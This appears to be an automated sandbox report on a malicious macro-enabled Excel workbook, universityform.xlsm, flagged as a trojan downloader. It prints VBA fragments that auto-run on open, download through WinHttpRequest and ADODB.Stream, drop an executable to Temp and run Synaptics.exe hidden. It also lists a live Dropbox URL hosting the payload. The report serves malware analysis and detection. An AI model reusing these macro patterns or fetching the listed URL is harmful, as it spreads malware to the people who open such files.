Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: TMP = Environ("Temp") & "\~$cache1.exe"Name: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") ThenName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHideName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") ThenName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function MPS, String environ: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHideName: MPS
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")Name: FDW
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, String winhttp.winhttprequest: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")Name: FDW
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'ADODB.Stream' functions open, savetofile, writeName: FDW
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function FDW, found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, sendName: FDW
Source: universityform.xlsmStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXECOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
Source: universityform.xlsmOLE, VBA macro line: Private Sub Workbook_Open()
Source: universityform.xlsmOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_BeforeCloseName: Workbook_BeforeClose
Source: universityform.xlsmOLE indicator, VBA macros: true
Source: ~DF239C91C02EE7BA70.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF3EEE7FA0A742E2A5.TMP.16.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal84.expl.evad.winXLSM@4/12@3/2
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$universityform.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{67438946-7BD4-4B04-973F-9098DB32CC18} - OProcSessId.datJump to behavior
Source: universityform.xlsmOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: universityform.xlsmVirustotal: Detection: 66%
Source: universityform.xlsmReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: universityform.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp2.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp9.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp3.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp4.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp5.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp6.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp7.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp8.xml
Source: universityform.xlsmInitial sample: OLE zip file path = xl/ctrlProps/ctrlProp1.xml
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DF239C91C02EE7BA70.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 995Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: universityform.xlsmOLE indicator, VBA stomping: true
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information42
Scripting
Valid Accounts3
Exploitation for Client Execution
42
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Obfuscated Files or Information
Boot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture114
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
universityform.xlsm66%VirustotalBrowse
universityform.xlsm68%ReversingLabsDocument-Word.Trojan.Orcinius
universityform.xlsm100%AviraW2000M/Dldr.Agent.17651006
universityform.xlsm100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
docs.google.com
142.250.184.206
truefalse
    high
    www-env.dropbox-dns.com
    162.125.66.18
    truefalse
      high
      www.dropbox.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1false
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          162.125.66.18
          www-env.dropbox-dns.comUnited States
          19679DROPBOXUSfalse
          142.250.184.206
          docs.google.comUnited States
          15169GOOGLEUSfalse
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1582321
          Start date and time:2024-12-30 11:04:39 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 51s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
          Run name:Potential for more IOCs and behavior
          Number of analysed new started processes analysed:24
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:universityform.xlsm
          Detection:MAL
          Classification:mal84.expl.evad.winXLSM@4/12@3/2
          Cookbook Comments:
          • Found application associated with file extension: .xlsm
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.109.76.243, 52.113.194.132, 52.109.68.130, 20.189.173.4, 23.38.98.84, 23.38.98.104, 23.38.98.96, 20.189.173.13, 23.212.88.34, 23.44.201.36, 184.28.90.27, 40.126.32.134, 4.175.87.197, 20.223.36.55
          • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, oneocsp.microsoft.com, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, onedscolprdwus03.westus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, officeclient.microsoft.com, c.pki.goog, res-1-tls.cdn.office.net, www.bing.com, ecs.office.com, e40491.dscg.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, fd.api.iris.microsoft.com, frc-azsc-000.odc.officeapps.live.com, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, x1.c.lencr.org, neu-azsc-config.officeapps.live.com, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, onedscolprdwus12.westus.cloudapp.azure.com, s-0005.s-msedg
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetValueKey calls found.
          TimeTypeDescription
          05:06:34API Interceptor1021x Sleep call for process: splwow64.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          162.125.66.18https://www.dropbox.com/l/scl/AACfaxhMBCajpVJfxiny0jrZK6hv1s8xd2MGet hashmaliciousUnknownBrowse
            bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
              hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                hnl2bose13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                  2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                    13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                      scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                          18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            www-env.dropbox-dns.comFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                            • 162.125.65.18
                            https://www.dropbox.com/scl/fi/lncgsm76k7l5ix7fuu5t6/2024-OK-House-Outreach.pdf?rlkey=o4qr50zpdw1z14o6ikdg6zjt8&st=lrloyzlo&dl=0Get hashmaliciousUnknownBrowse
                            • 162.125.65.18
                            hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 162.125.65.18
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 162.125.65.18
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 162.125.69.18
                            https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                            • 162.125.65.18
                            hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 162.125.69.18
                            slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 162.125.69.18
                            De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                            • 162.125.69.18
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            DROPBOXUSFLKCAS1DzH.batGet hashmaliciousUnknownBrowse
                            • 162.125.65.18
